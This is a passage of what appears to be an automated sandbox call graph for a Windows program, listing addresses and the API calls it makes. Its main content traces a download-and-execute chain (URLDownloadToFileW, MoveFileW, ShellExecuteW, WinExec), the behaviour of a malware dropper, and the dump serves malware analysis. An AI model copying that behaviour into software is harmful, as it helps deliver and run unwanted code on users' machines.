465a964 72 API calls 12659->12660 12661 46f26ad 12660->12661 12662 4639410 4 API calls 12661->12662 12662->12655 12664 4639c71 12663->12664 12665 4639c90 CreateThread 12664->12665 12666 4639cb9 12665->12666 12666->12656 12668 470387b 12667->12668 12669 4638c24 5 API calls 12668->12669 12670 4703883 12669->12670 12671 46389ac 13 API calls 12670->12671 12672 470388b 12671->12672 12672->12638 12683 466fbd4 12673->12683 12675 466e957 12675->12642 12677 465a7a8 12676->12677 12678 4655cc4 72 API calls 12677->12678 12679 465a7d5 12678->12679 12679->12648 12681 4638b8c 7 API calls 12680->12681 12682 46f29f1 12681->12682 12682->12611 12684 466fbe4 12683->12684 12685 466fbed 12684->12685 12688 466fbf7 12684->12688 12686 466fb94 26 API calls 12685->12686 12689 466fbf5 12686->12689 12687 466fc00 12687->12675 12688->12687 12690 465a754 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12688->12690 12689->12675 12690->12687 12691->12615 12693 4761d04 7 API calls 12692->12693 12694 4761d6a 12693->12694 12694->12412 12695 4635ee4 12696 4635ef4 12695->12696 12697 4635f7c 12695->12697 12700 4635f01 12696->12700 12701 4635f38 12696->12701 12698 4635f85 12697->12698 12699 463581c 12697->12699 12703 4635f9d 12698->12703 12717 46360ac 12698->12717 12702 46361f7 12699->12702 12707 4635840 VirtualQuery 12699->12707 12708 463591f 12699->12708 12705 4635f0c 12700->12705 12709 4635968 10 API calls 12700->12709 12704 4635968 10 API calls 12701->12704 12713 4635fc0 12703->12713 12714 4636084 12703->12714 12720 4635fa4 12703->12720 12706 4635f4f 12704->12706 12731 4635cec 10 API calls 12706->12731 12736 4635f75 12706->12736 12718 46358e7 12707->12718 12719 4635879 12707->12719 12712 4635968 10 API calls 12708->12712 12746 463591d 12708->12746 12710 4635f19 12709->12710 12729 4635cec 10 API calls 12710->12729 12735 4635f31 12710->12735 12711 4635968 10 API calls 12722 46361c0 12711->12722 12740 4635936 12712->12740 12713->12720 12725 4636000 Sleep 12713->12725 12716 4635968 10 API calls 12714->12716 12738 463608d 12716->12738 12723 46360e8 Sleep 12717->12723 12724 4636110 12717->12724 12728 4636129 12717->12728 12747 4635968 12718->12747 12719->12718 12726 46358a6 VirtualAlloc 12719->12726 12727 46358a4 12719->12727 12722->12728 12739 4635cec 10 API calls 12722->12739 12723->12724 12732 4636102 Sleep 12723->12732 12724->12711 12724->12728 12725->12720 12733 4636018 Sleep 12725->12733 12726->12718 12734 46358bc VirtualAlloc 12726->12734 12727->12726 12729->12735 12730 46360a5 12731->12736 12732->12717 12733->12713 12734->12718 12737 46358d2 12734->12737 12737->12746 12738->12730 12742 4635cec 10 API calls 12738->12742 12743 46361e4 12739->12743 12744 4635cec 10 API calls 12740->12744 12740->12746 12741 46358ee 12741->12746 12771 4635cec 12741->12771 12742->12730 12744->12746 12748 4635bc8 12747->12748 12757 4635980 12747->12757 12749 4635ce0 12748->12749 12755 4635b8c 12748->12755 12750 4635714 VirtualAlloc 12749->12750 12751 4635ce9 12749->12751 12752 463574f 12750->12752 12753 463573f 12750->12753 12751->12741 12752->12741 12791 46356c8 12753->12791 12754 46359a1 12754->12741 12759 4635be6 12755->12759 12761 4635ba6 Sleep 12755->12761 12756 4635992 12756->12754 12760 4635a80 12756->12760 12765 4635a61 Sleep 12756->12765 12757->12756 12763 4635a1d Sleep 12757->12763 12766 463564c VirtualAlloc 12759->12766 12767 4635c04 12759->12767 12770 4635a8c 12760->12770 12796 463564c 12760->12796 12761->12759 12762 4635bbc Sleep 12761->12762 12762->12755 12763->12756 12764 4635a33 Sleep 12763->12764 12764->12757 12765->12760 12769 4635a77 Sleep 12765->12769 12766->12767 12767->12741 12769->12756 12770->12741 12772 4635d01 12771->12772 12773 4635de4 12771->12773 12775 4635d07 12772->12775 12779 4635d7e Sleep 12772->12779 12774 4635778 12773->12774 12773->12775 12777 4635ede 12774->12777 12778 46356c8 2 API calls 12774->12778 12776 4635d10 12775->12776 12782 4635dc2 Sleep 12775->12782 12785 4635df9 12775->12785 12776->12746 12777->12746 12780 4635789 12778->12780 12779->12775 12781 4635d98 Sleep 12779->12781 12784 463579f VirtualFree 12780->12784 12790 46357b9 12780->12790 12781->12772 12783 4635dd8 Sleep 12782->12783 12782->12785 12783->12775 12788 46357b0 12784->12788 12787 4635e78 VirtualFree 12785->12787 12789 4635e1c 12785->12789 12786 46357c2 VirtualQuery VirtualFree 12786->12788 12786->12790 12787->12746 12788->12746 12789->12746 12790->12786 12790->12788 12792 46356d1 12791->12792 12793 4635710 12791->12793 12792->12793 12794 46356dc Sleep 12792->12794 12793->12752 12794->12793 12795 46356f6 Sleep 12794->12795 12795->12792 12800 46355e0 12796->12800 12798 4635655 VirtualAlloc 12799 463566c 12798->12799 12799->12770 12801 4635580 12800->12801 12801->12798 12802 4640c34 12803 4640c5a 12802->12803 12804 4640cdb 12802->12804 12803->12804 12806 4640844 12803->12806 12807 464086f 12806->12807 12808 46408e0 RaiseException 12807->12808 12809 4640908 12807->12809 12825 4640975 12808->12825 12810 4640a3e 12809->12810 12811 464099d LoadLibraryA 12809->12811 12812 46409a8 12809->12812 12809->12825 12813 4640aa7 12810->12813 12816 4640a9b GetProcAddress 12810->12816 12810->12825 12811->12812 12814 46409f7 12812->12814 12815 46409ac GetLastError 12812->12815 12817 4640aab GetLastError 12813->12817 12813->12825 12822 4640a05 12814->12822 12823 4640a38 FreeLibrary 12814->12823 12819 46409bd 12815->12819 12816->12813 12818 4640abc 12817->12818 12820 4640ace RaiseException 12818->12820 12818->12825 12819->12814 12821 46409cf RaiseException 12819->12821 12820->12825 12821->12825 12822->12810 12824 4640a0b LocalAlloc 12822->12824 12823->12810 12824->12810 12826 4640a1b 12824->12826 12825->12803 12826->12810 12827 484ad34 12828 484ad63 12827->12828 12829 484adb2 GetMessageW 12828->12829 12831 4654e34 6 API calls 12828->12831 12830 484ada6 TranslateMessage DispatchMessageW 12829->12830 12833 484adc2 12829->12833 12830->12829 12832 484ad72 12831->12832 12832->12829 12834 4655804 CreateDirectoryW 12832->12834 12835 484ad80 12834->12835 12840 4849f40 12835->12840 12837 484ad94 12844 484ac78 12837->12844 12839 484ada4 12839->12829 12841 4849f54 12840->12841 12853 484aae8 12841->12853 12843 4849f88 12843->12837 12845 484ac8f 12844->12845 12846 484ac9f Sleep 12845->12846 12847 484acc3 12846->12847 12848 484accc URLDownloadToFileW 12847->12848 12849 484ace8 12848->12849 12908 4849554 12849->12908 12851 484ad04 Sleep 12852 484ad28 12851->12852 12852->12839 12857 484ab1d 12853->12857 12854 484abae 12861 463eefc 12854->12861 12856 484ac17 12859 4639ddc SysFreeString 12856->12859 12857->12854 12877 46545e8 12857->12877 12860 484ac37 12859->12860 12860->12843 12862 4639ddc SysFreeString 12861->12862 12863 463ef24 12862->12863 12864 463ef7f 12863->12864 12881 463a800 12863->12881 12866 4639ddc SysFreeString 12864->12866 12867 463ef94 12866->12867 12867->12856 12868 463ef3f 12887 463ed58 12868->12887 12871 463ef5f 12873 463a800 2 API calls 12871->12873 12872 463ef6c 12874 4639ddc SysFreeString 12872->12874 12875 463ef6a 12873->12875 12874->12875 12876 463a1e8 3 API calls 12875->12876 12876->12864 12878 46545f8 12877->12878 12879 4654619 12878->12879 12903 46532b0 12878->12903 12879->12857 12882 463a80d 12881->12882 12886 463a814 12881->12886 12894 4639d7c 12882->12894 12898 463a650 12886->12898 12888 463ed8a 12887->12888 12889 463ed6d 12887->12889 12888->12871 12888->12872 12890 463edc8 12889->12890 12891 463ed75 12889->12891 12902 463f114 MultiByteToWideChar 12890->12902 12901 463f114 MultiByteToWideChar 12891->12901 12895 4639d90 12894->12895 12896 4639d80 SysAllocStringLen 12894->12896 12895->12886 12896->12895 12897 4639d74 12896->12897 12897->12894 12899 463a656 SysFreeString 12898->12899 12900 463a65c 12898->12900 12899->12900 12900->12868 12901->12888 12902->12888 12904 465a964 72 API calls 12903->12904 12905 46532c9 12904->12905 12906 4639410 4 API calls 12905->12906 12907 46532ce 12906->12907 12907->12879 12909 484955d 12908->12909 12930 484ca7c 12909->12930 12911 484963d 12936 483af64 12911->12936 12917 484967b 12991 4655394 12917->12991 12919 48496aa 12920 4655394 5 API calls 12919->12920 12921 48496d4 12920->12921 13000 465d814 12921->13000 12923 48496e1 12924 484970f MoveFileW Sleep 12923->12924 12925 4849734 12924->12925 13006 484a074 12925->13006 12927 484974c 13010 484991c Sleep WinExec Sleep 12927->13010 12929 4849759 Sleep 12929->12851 12931 484ca90 12930->12931 13011 46e5914 12931->13011 12933 484cadd 13016 46e5828 12933->13016 12935 484cb24 12935->12911 12937 483b0d4 74 API calls 12936->12937 12938 483af7b 12937->12938 12939 483af8b 12938->12939 12942 465a894 46 API calls 12938->12942 12940 46e54f0 80 API calls 12939->12940 12941 483afc4 12940->12941 13032 483b014 12941->13032 12944 483afaf 12942->12944 12946 4639410 4 API calls 12944->12946 12946->12939 12947 483bdac 12948 483bdbd 12947->12948 12951 483bdd4 12947->12951 12949 465a894 46 API calls 12948->12949 12952 483bdcf 12949->12952 12950 483bdf3 12955 483b0d4 12950->12955 12951->12950 13106 483b5ac 12951->13106 12953 4639410 4 API calls 12952->12953 12953->12951 12958 483b0f1 12955->12958 12956 483b4f1 12957 466ea88 72 API calls 12956->12957 12960 483b513 12957->12960 12958->12956 12959 483b15c 12958->12959 12965 483b372 12958->12965 12961 463b08c 16 API calls 12959->12961 12960->12917 12962 483b189 12961->12962 12963 466cff0 50 API calls 12962->12963 12964 483b194 12963->12964 12967 463b34c 26 API calls 12964->12967 12966 483b3f2 12965->12966 12968 463c0c0 26 API calls 12965->12968 13293 4838f78 12966->13293 12969 483b1b1 12967->12969 12968->12966 12970 463b34c 26 API calls 12969->12970 12972 483b1c2 12970->12972 12974 463b08c 16 API calls 12972->12974 12976 483b1dd 12974->12976 12976->12917 12978 4838f38 46 API calls 12979 483b460 12978->12979 12980 4838f38 46 API calls 12979->12980 12981 483b477 12980->12981 12982 4838f38 46 API calls 12981->12982 12983 483b48e 12982->12983 12984 4838f78 46 API calls 12983->12984 12985 483b4a4 12984->12985 12986 4838f78 46 API calls 12985->12986 12987 483b4ba 12986->12987 12988 4838f38 46 API calls 12987->12988 12989 483b4d1 12988->12989 12989->12956 13301 4838ec0 12989->13301 12992 463a8a4 12991->12992 12993 46553a1 DeleteFileW 12992->12993 12994 46553b3 GetLastError GetFileAttributesW 12993->12994 12995 46553e9 12993->12995 12996 46553c5 12994->12996 12997 46553e3 SetLastError 12994->12997 12995->12919 12996->12997 12998 46553ce 12996->12998 12997->12995 12999 46553d5 RemoveDirectoryW 12998->12999 12999->12995 13001 465d829 13000->13001 13002 465d83a GetEnvironmentVariableW 13001->13002 13003 465d84c 13002->13003 13004 465d859 13002->13004 13003->12923 13005 465d86b GetEnvironmentVariableW 13004->13005 13005->13003 13007 484a08b 13006->13007 13008 484a0bf ShellExecuteW 13007->13008 13009 484a0eb 13008->13009 13009->12927 13010->12929 13012 46e54f0 80 API calls 13011->13012 13013 46e592b 13012->13013 13019 46e58c4 13013->13019 13015 46e5946 13015->12933 13017 46e54f0 80 API calls 13016->13017 13018 46e5842 13017->13018 13018->12935 13020 46e58d8 13019->13020 13021 46e590e 13020->13021 13023 46e3c88 13020->13023 13021->13015 13024 46e3ca5 13023->13024 13026 465a894 46 API calls 13024->13026 13030 46e3cc2 13024->13030 13025 46e3cfd 13025->13021 13027 46e3cbd 13026->13027 13028 4639410 4 API calls 13027->13028 13028->13030 13029 465a894 46 API calls 13029->13030 13030->13025 13030->13029 13031 4639410 4 API calls 13030->13031 13031->13030 13033 483b0d4 74 API calls 13032->13033 13034 483b02a 13033->13034 13035 465a894 46 API calls 13034->13035 13040 483b045 13034->13040 13036 483b040 13035->13036 13037 4639410 4 API calls 13036->13037 13037->13040 13038 483b071 13039 483afe1 13038->13039 13045 4839db0 13038->13045 13039->12947 13040->13038 13042 465a894 46 API calls 13040->13042 13043 483b06c 13042->13043 13044 4639410 4 API calls 13043->13044 13044->13038 13046 4839dc9 13045->13046 13065 466ea88 13046->13065 13049 483a01b 13051 463b08c 16 API calls 13049->13051 13053 483a036 13051->13053 13052 4839e01 13054 465a894 46 API calls 13052->13054 13057 4839e1c 13052->13057 13053->13039 13055 4839e17 13054->13055 13056 4639410 4 API calls 13055->13056 13056->13057 13057->13049 13058 465a894 46 API calls 13057->13058 13059 4639410 4 API calls 13057->13059 13060 4838e48 46 API calls 13057->13060 13061 4838e84 46 API calls 13057->13061 13062 463c0c0 26 API calls 13057->13062 13063 4838dd0 46 API calls 13057->13063 13078 466e9d0 13057->13078 13058->13057 13059->13057 13060->13057 13061->13057 13062->13057 13063->13057 13083 4671008 13065->13083 13070 483a89c 13071 483a8c9 13070->13071 13072 463c0c0 26 API calls 13071->13072 13073 483a90b 13072->13073 13075 483aa8c 13073->13075 13077 483ab02 13073->13077 13102 4838dd0 13073->13102 13076 463c0c0 26 API calls 13075->13076 13075->13077 13076->13077 13077->13052 13079 466fbd4 26 API calls 13078->13079 13080 466e9e7 13079->13080 13081 463b8f8 26 API calls 13080->13081 13082 466ea12 13081->13082 13082->13057 13084 4671013 13083->13084 13085 467102a 13083->13085 13086 465a894 46 API calls 13084->13086 13087 4671049 13085->13087 13090 4670e5c 26 API calls 13085->13090 13088 4671025 13086->13088 13091 466ea94 13087->13091 13096 466f150 13087->13096 13089 4639410 4 API calls 13088->13089 13089->13085 13090->13087 13093 4670e5c 13091->13093 13094 463be18 26 API calls 13093->13094 13095 466ea9d 13094->13095 13095->13049 13095->13070 13097 466f168 13096->13097 13098 465a894 46 API calls 13097->13098 13101 466f19a 13097->13101 13099 466f195 13098->13099 13100 4639410 4 API calls 13099->13100 13100->13101 13101->13091 13103 4838de5 13102->13103 13104 4838e18 13103->13104 13105 465a894 46 API calls 13103->13105 13104->13073 13105->13104 13107 483b5f7 13106->13107 13108 463b08c 16 API calls 13107->13108 13109 483b676 13108->13109 13136 483c204 13109->13136 13112 463b34c 26 API calls 13113 483b6a5 13112->13113 13154 483adbc 13113->13154 13115 483b6cd 13116 483b6d5 13115->13116 13117 483b75c 13115->13117 13118 463b08c 16 API calls 13116->13118 13169 465c0f4 13117->13169 13120 483b6fa 13118->13120 13122 466cff0 50 API calls 13120->13122 13121 483b77d 13124 483b791 13121->13124 13129 483b7db 13121->13129 13123 483b708 13122->13123 13125 463b34c 26 API calls 13123->13125 13182 472b468 13124->13182 13127 483b728 13125->13127 13160 4839774 13127->13160 13131 472b468 50 API calls 13129->13131 13130 483b739 13132 463b08c 16 API calls 13130->13132 13135 483b81a 13131->13135 13133 483b754 13132->13133 13133->12951 13134 483b7b3 13134->12951 13135->12951 13137 483c230 13136->13137 13138 483c27d 13137->13138 13139 465a894 46 API calls 13137->13139 13141 483c2a8 13138->13141 13142 465a894 46 API calls 13138->13142 13140 483c278 13139->13140 13144 4639410 4 API calls 13140->13144 13146 463b08c 16 API calls 13141->13146 13143 483c2a3 13142->13143 13145 4639410 4 API calls 13143->13145 13144->13138 13145->13141 13147 483c30e 13146->13147 13148 466cff0 50 API calls 13147->13148 13149 483c319 13148->13149 13150 463b34c 26 API calls 13149->13150 13151 483c336 13150->13151 13152 463b08c 16 API calls 13151->13152 13153 483b68e 13152->13153 13153->13112 13155 483add6 13154->13155 13159 483ae6e 13155->13159 13194 4661a18 13155->13194 13157 483ae63 13198 4661850 13157->13198 13159->13115 13161 4839790 13160->13161 13162 48397b3 13161->13162 13163 48397a4 13161->13163 13165 4661740 52 API calls 13162->13165 13254 4661740 13163->13254 13166 48397ae 13165->13166 13167 4661850 72 API calls 13166->13167 13168 48397fa 13167->13168 13168->13130 13170 465c12d 13169->13170 13175 465c1b8 13170->13175 13181 465c14d 13170->13181 13260 465379c 13170->13260 13174 465c185 13174->13175 13176 465379c CharUpperBuffW 13174->13176 13177 465c2a2 13175->13177 13180 465c210 13175->13180 13176->13175 13179 463c0c0 26 API calls 13177->13179 13177->13181 13179->13177 13180->13181 13268 465f89c 13180->13268 13181->13121 13185 472b4a0 13182->13185 13193 472b492 13182->13193 13183 472b500 13284 472bef4 13183->13284 13185->13183 13186 465a894 46 API calls 13185->13186 13188 472b4dc 13185->13188 13185->13193 13187 472b4d7 13186->13187 13189 4639410 4 API calls 13187->13189 13188->13183 13190 465a894 46 API calls 13188->13190 13189->13188 13191 472b4fb 13190->13191 13192 4639410 4 API calls 13191->13192 13192->13183 13193->13134 13195 4661a21 13194->13195 13197 4661a2d 13194->13197 13222 4661e2c 13195->13222 13197->13157 13199 466186d 13198->13199 13200 4661891 13199->13200 13202 465a894 46 API calls 13199->13202 13201 46618b9 13200->13201 13203 465a964 72 API calls 13200->13203 13204 46618e1 13201->13204 13207 465a964 72 API calls 13201->13207 13205 466188c 13202->13205 13206 46618b4 13203->13206 13208 4661916 13204->13208 13212 465a964 72 API calls 13204->13212 13209 4639410 4 API calls 13205->13209 13210 4639410 4 API calls 13206->13210 13211 46618dc 13207->13211 13236 4661100 13208->13236 13209->13200 13210->13201 13214 4639410 4 API calls 13211->13214 13215 4661911 13212->13215 13214->13204 13217 4639410 4 API calls 13215->13217 13217->13208 13218 465a894 46 API calls 13219 4661940 13218->13219 13221 4639410 4 API calls 13219->13221 13220 4661945 13220->13159 13221->13220 13223 4661e32 13222->13223 13226 4661b14 13223->13226 13225 4661e50 13225->13197 13227 4661b20 13226->13227 13228 4661b30 GetACP 13227->13228 13229 4661b3a 13227->13229 13230 4661b3d GetCPInfo 13228->13230 13229->13230 13231 4661b5a 13230->13231 13234 4661b71 13230->13234 13232 465a894 46 API calls 13231->13232 13233 4661b6c 13232->13233 13235 4639410 4 API calls 13233->13235 13234->13225 13235->13234 13237 4661111 13236->13237 13238 466112c 13236->13238 13237->13238 13241 465a894 46 API calls 13237->13241 13239 4661159 13238->13239 13240 465a964 72 API calls 13238->13240 13243 465a964 72 API calls 13239->13243 13244 4661181 13239->13244 13242 4661154 13240->13242 13245 4661127 13241->13245 13246 4639410 4 API calls 13242->13246 13247 466117c 13243->13247 13248 46611b7 13244->13248 13251 465a964 72 API calls 13244->13251 13249 4639410 4 API calls 13245->13249 13246->13239 13250 4639410 4 API calls 13247->13250 13248->13218 13248->13220 13249->13238 13250->13244 13252 46611b2 13251->13252 13253 4639410 4 API calls 13252->13253 13253->13248 13255 466175a 13254->13255 13256 466174a 13254->13256 13255->13166 13257 4661e2c 52 API calls 13256->13257 13259 4661758 13256->13259 13258 466178d 13257->13258 13258->13166 13259->13166 13262 46537ab 13260->13262 13261 46537cc 13264 46537d0 13261->13264 13262->13261 13263 46537c6 CharUpperBuffW 13262->13263 13263->13261 13266 46537dd 13264->13266 13265 4653808 13265->13174 13266->13265 13267 4653802 CharLowerBuffW 13266->13267 13267->13265 13271 465fa18 13268->13271 13274 465f8c0 13271->13274 13275 465f8d2 13274->13275 13276 465f8eb 13274->13276 13280 465f974 13275->13280 13278 465f974 CompareStringW 13276->13278 13279 465f8b9 13278->13279 13279->13180 13281 465f98d 13280->13281 13282 465f9e7 CompareStringW 13281->13282 13283 465f9af 13281->13283 13282->13283 13283->13279 13287 472b9c4 13284->13287 13286 472befb 13286->13193 13288 472b9d8 13287->13288 13292 472ba02 13287->13292 13289 465a894 46 API calls 13288->13289 13288->13292 13290 472b9fd 13289->13290 13291 4639410 4 API calls 13290->13291 13291->13292 13292->13286 13294 4838f91 13293->13294 13295 4838faa 13294->13295 13296 465a894 46 API calls 13294->13296 13297 4838f38 13295->13297 13296->13295 13298 4838f52 13297->13298 13299 4838f6b 13298->13299 13300 465a894 46 API calls 13298->13300 13299->12978 13300->13299 13302 4838ed5 13301->13302 13303 4838f09 13302->13303 13304 465a894 46 API calls 13302->13304 13303->12956 13304->13303 13305 483bc32 13306 483bc3f 13305->13306 13307 483bcec 13305->13307 13309 463b08c 16 API calls 13306->13309 13308 463b08c 16 API calls 13307->13308 13310 483bd0d 13308->13310 13311 483bc67 13309->13311 13312 466cff0 50 API calls 13311->13312 13313 483bc75 13312->13313 13314 463b34c 26 API calls 13313->13314 13315 483bc98 13314->13315 13322 472b100 13315->13322 13320 463b08c 16 API calls 13321 483bce4 13320->13321 13329 472b310 13322->13329 13324 472b107 13325 472b1bc 13324->13325 13326 472b1cd 13325->13326 13379 4655188 13326->13379 13328 472b1d8 13328->13320 13330 472b430 50 API calls 13329->13330 13331 472b339 13330->13331 13332 465a894 46 API calls 13331->13332 13335 472b35b 13331->13335 13333 472b356 13332->13333 13334 4639410 4 API calls 13333->13334 13334->13335 13336 465a894 46 API calls 13335->13336 13340 472b382 13335->13340 13337 472b37d 13336->13337 13338 4639410 4 API calls 13337->13338 13338->13340 13339 472b3a6 13342 472b7c8 10 API calls 13339->13342 13340->13339 13341 465a894 46 API calls 13340->13341 13343 472b3a1 13341->13343 13344 472b3b0 13342->13344 13345 4639410 4 API calls 13343->13345 13346 4654e34 6 API calls 13344->13346 13345->13339 13347 472b3c5 13346->13347 13348 472b3e0 13347->13348 13349 465a894 46 API calls 13347->13349 13350 472b408 13348->13350 13358 472b1dc 13348->13358 13351 472b3db 13349->13351 13350->13324 13353 4639410 4 API calls 13351->13353 13353->13348 13355 465a894 46 API calls 13356 472b403 13355->13356 13357 4639410 4 API calls 13356->13357 13357->13350 13361 4654d9c 13358->13361 13362 463a8a4 13361->13362 13363 4654daa GetFileAttributesW 13362->13363 13364 4654db7 13363->13364 13365 4654e06 GetLastError 13363->13365 13367 4654dc0 13364->13367 13369 4654dcc CreateFileW 13364->13369 13366 4654e12 13365->13366 13365->13367 13366->13367 13368 4654e1c 13366->13368 13367->13350 13367->13355 13374 4654d5c 13368->13374 13371 4654de6 CloseHandle 13369->13371 13372 4654df0 GetLastError 13369->13372 13371->13367 13372->13367 13375 463a8a4 13374->13375 13376 4654d76 FindFirstFileW 13375->13376 13377 4654d81 FindClose 13376->13377 13378 4654d93 13376->13378 13377->13378 13378->13367 13380 46551b9 13379->13380 13381 46551bf 13380->13381 13382 4655219 13380->13382 13383 46551c6 GetFileAttributesW 13381->13383 13384 4655222 SetFileAttributesW 13382->13384 13383->13382 13385 46551d1 13383->13385 13386 4655233 13384->13386 13387 465522c GetLastError 13384->13387 13390 4653194 13385->13390 13386->13328 13387->13386 13389 46551db 13389->13382 13391 46531b1 13390->13391 13392 465325c 13391->13392 13393 4654d9c 7 API calls 13391->13393 13392->13389 13394 46531c2 13393->13394 13394->13392 13403 4654acc 13394->13403 13396 46531d1 13396->13392 13397 46531e0 GetFileAttributesW 13396->13397 13397->13392 13398 46531eb 13397->13398 13398->13392 13399 4653212 CreateFileW 13398->13399 13399->13392 13400 4653221 13399->13400 13422 4652f44 13400->13422 13402 465323b CloseHandle 13402->13389 13404 463c0c0 26 API calls 13403->13404 13405 4654b03 13404->13405 13406 463c0c0 26 API calls 13405->13406 13407 4654b1e 13406->13407 13408 4654e34 6 API calls 13407->13408 13409 4654b31 13408->13409 13410 4654d9c 7 API calls 13409->13410 13412 4654b3e 13409->13412 13410->13412 13411 4654bd0 13413 463f080 46 API calls 13411->13413 13412->13411 13414 4654b81 GetVolumeInformationW 13412->13414 13415 4654bdd 13413->13415 13416 4654bcb 13414->13416 13419 4654b8d GetDriveTypeW 13414->13419 13418 4639410 4 API calls 13415->13418 13443 465cae0 GetLastError 13416->13443 13421 4654bb3 13418->13421 13419->13421 13421->13396 13423 4639d94 13422->13423 13424 4652f94 GetFileSize 13423->13424 13425 4652fac 13424->13425 13426 465301b 13424->13426 13425->13426 13436 4652fdd 13425->13436 13427 4653029 CreateFileMappingW 13426->13427 13428 4653117 13426->13428 13427->13428 13429 465304c MapViewOfFile 13427->13429 13434 4653004 13428->13434 13463 4652e58 13428->13463 13430 46530f9 CloseHandle 13429->13430 13431 4653078 GetCurrentProcess 13429->13431 13430->13402 13460 4646620 13431->13460 13434->13402 13435 46530db UnmapViewOfFile 13435->13402 13456 4652d1c GetLogicalDriveStringsW 13436->13456 13437 465312b 13437->13434 13439 4652d1c 2 API calls 13437->13439 13438 465309e 13438->13435 13440 4652d1c 2 API calls 13438->13440 13439->13434 13441 46530c9 13440->13441 13441->13435 13446 465caf0 13443->13446 13445 465caec 13445->13411 13447 465cb53 13446->13447 13448 465cb13 13446->13448 13450 465a894 46 API calls 13447->13450 13449 4659220 2 API calls 13448->13449 13451 465cb26 13449->13451 13453 465cb4f 13450->13453 13452 465a964 72 API calls 13451->13452 13452->13453 13454 4639410 4 API calls 13453->13454 13455 465cb71 13454->13455 13455->13445 13458 4652d68 13456->13458 13459 4652db5 13456->13459 13457 4652d6e QueryDosDeviceW 13457->13458 13458->13457 13458->13459 13459->13434 13468 4646144 13460->13468 13462 4646631 13462->13438 13464 4652e6b 13463->13464 13465 4652e74 GetModuleHandleW 13464->13465 13467 4652e89 13464->13467 13466 4644e00 2 API calls 13465->13466 13466->13467 13467->13437 13469 4646153 LoadLibraryW 13468->13469 13517 4646301 13468->13517 13470 4646164 13469->13470 13471 4646168 13469->13471 13470->13462 13518 4644e00 13471->13518 13473 4646175 13474 4644e00 2 API calls 13473->13474 13475 4646187 13474->13475 13476 4644e00 2 API calls 13475->13476 13477 4646199 13476->13477 13478 4644e00 2 API calls 13477->13478 13479 46461ab 13478->13479 13480 4644e00 2 API calls 13479->13480 13481 46461bd 13480->13481 13482 4644e00 2 API calls 13481->13482 13483 46461cf 13482->13483 13484 4644e00 2 API calls 13483->13484 13485 46461e1 13484->13485 13486 4644e00 2 API calls 13485->13486 13487 46461f3 13486->13487 13488 4644e00 2 API calls 13487->13488 13489 4646205 13488->13489 13490 4644e00 2 API calls 13489->13490 13491 4646217 13490->13491 13492 4644e00 2 API calls 13491->13492 13493 4646229 13492->13493 13494 4644e00 2 API calls 13493->13494 13495 464623b 13494->13495 13496 4644e00 2 API calls 13495->13496 13497 464624d 13496->13497 13498 4644e00 2 API calls 13497->13498 13499 464625f 13498->13499 13500 4644e00 2 API calls 13499->13500 13501 4646271 13500->13501 13502 4644e00 2 API calls 13501->13502 13503 4646283 13502->13503 13504 4644e00 2 API calls 13503->13504 13505 4646295 13504->13505 13506 4644e00 2 API calls 13505->13506 13507 46462a7 13506->13507 13508 4644e00 2 API calls 13507->13508 13509 46462b9 13508->13509 13510 4644e00 2 API calls 13509->13510 13511 46462cb 13510->13511 13512 4644e00 2 API calls 13511->13512 13513 46462dd 13512->13513 13514 4644e00 2 API calls 13513->13514 13515 46462ef 13514->13515 13516 4644e00 2 API calls 13515->13516 13516->13517 13517->13462 13519 4644e28 GetProcAddress 13518->13519 13521 4644e34 13518->13521 13520 4644e80 13519->13520 13520->13473 13522 4644e59 GetProcAddress 13521->13522 13523 4644e78 13522->13523 13523->13473 13524 483bb11 13525 4654d9c 7 API calls 13524->13525 13526 483bb1b 13525->13526 13546 483bc2a 13526->13546 13547 4838d58 13526->13547 13528 463b08c 16 API calls 13530 483bd0d 13528->13530 13531 483bb9e 13532 463b08c 16 API calls 13531->13532 13534 483bbc6 13532->13534 13536 466cff0 50 API calls 13534->13536 13538 483bbd4 13536->13538 13540 463b34c 26 API calls 13538->13540 13539 483bb69 13570 472b110 13539->13570 13542 483bbf7 13540->13542 13545 463b08c 16 API calls 13542->13545 13544 472af38 114 API calls 13544->13531 13545->13546 13546->13528 13548 4838d8e 13547->13548 13549 4838dba 13548->13549 13573 46573a8 13548->13573 13549->13531 13551 472b108 13549->13551 13552 472b310 69 API calls 13551->13552 13553 472b10f 13552->13553 13554 472af38 13553->13554 13555 472af7f 13554->13555 13557 472af9b 13554->13557 13592 472a678 13555->13592 13556 472b00f SetLastError 13584 46550d0 13556->13584 13560 472a678 2 API calls 13557->13560 13561 472afce 13557->13561 13560->13561 13561->13556 13562 472a678 2 API calls 13561->13562 13563 472b001 13562->13563 13563->13556 13564 472b01f 13565 472b047 CreateFileW 13564->13565 13566 472b056 SetFileTime 13565->13566 13567 472b06b CloseHandle SetLastError 13565->13567 13566->13567 13569 472b0c6 13567->13569 13569->13539 13571 472b310 69 API calls 13570->13571 13572 472b117 13571->13572 13572->13544 13574 4657408 13573->13574 13575 46573bc 13573->13575 13574->13549 13575->13574 13577 4657328 13575->13577 13580 46572a0 13577->13580 13581 46572aa 13580->13581 13582 46532b0 72 API calls 13581->13582 13583 46572e1 13581->13583 13582->13583 13583->13574 13585 463a8a4 13584->13585 13586 46550f5 GetFileAttributesW 13585->13586 13587 465515a 13586->13587 13588 465510a 13586->13588 13587->13564 13589 4653194 105 API calls 13588->13589 13590 4655117 13589->13590 13590->13587 13591 4655152 GetFileAttributesW 13590->13591 13591->13587 13598 471e4a8 13592->13598 13594 472a6b6 SystemTimeToFileTime 13595 472a6c7 13594->13595 13596 472a6da 13594->13596 13595->13596 13597 472a6cb LocalFileTimeToFileTime 13595->13597 13596->13557 13597->13596 13599 471e4bb 13598->13599 13599->13594 13600 483c374 13601 483c387 13600->13601 13602 465a894 46 API calls 13601->13602 13605 483c3a9 13601->13605 13603 483c3a4 13602->13603 13604 4639410 4 API calls 13603->13604 13604->13605 13606 463c0c0 26 API calls 13605->13606 13607 483c48d 13606->13607 13608 483c4ce 13607->13608 13609 463c0c0 26 API calls 13607->13609 13610 463b08c 16 API calls 13608->13610 13609->13608 13611 483c50b 13610->13611 13612 466cff0 50 API calls 13611->13612 13613 483c516 13612->13613 13614 463b34c 26 API calls 13613->13614 13615 483c533 13614->13615 13620 483d618 13615->13620 13618 463b08c 16 API calls 13619 483c57c 13618->13619 13621 483d62b 13620->13621 13622 483d653 13621->13622 13623 465a894 46 API calls 13621->13623 13624 463b34c 26 API calls 13622->13624 13626 483d64e 13623->13626 13625 483c54b 13624->13625 13625->13618 13627 4639410 4 API calls 13626->13627 13627->13622 13628 4637cfb 13633 4637c54 13628->13633 13630 